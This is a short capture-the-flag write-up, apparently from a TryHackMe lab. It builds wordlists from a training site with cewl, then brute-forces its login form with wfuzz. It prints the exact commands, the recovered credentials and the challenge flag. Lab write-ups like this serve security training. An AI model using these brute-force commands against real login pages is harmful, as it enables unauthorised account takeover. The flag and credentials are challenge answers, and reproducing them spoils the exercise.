First, I started the machine of the task of day 4.
Then in order to use AntarctiCrafts homepage to generate a wordlist that could potentially hold the key to the portal, I used this command:
cewl -d 2 -m 5 -w passwords.txt MACHINE_IP --with-numbers
Then to narrow down the search as the page of teams might contain the desired information, I used this command:
cewl -d 0 -m 5 -w usernames.txt MACHINE_IP/team.php --lowercase
Then to check the size of the files, I used ls -al command.
- Next, I used the command head passwords.txt to see the top part of the password list.
- Then I used the given address to open the login page where it was requiring credentials.
Since Wfuzz is a tool designed for brute-forcing web applications, I used this command:
wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u MACHINE_IP/login.php -d "username=FUZZ&password=FUZ2Z"
Using this command led to finding the username and password
Which were:
Username: isaias
Password: Happiness
- I used these credentials to log into that page and obtained the flag.
Finally, I found the flag!
Flag: THM{m3rrY4nt4rct1crAft$}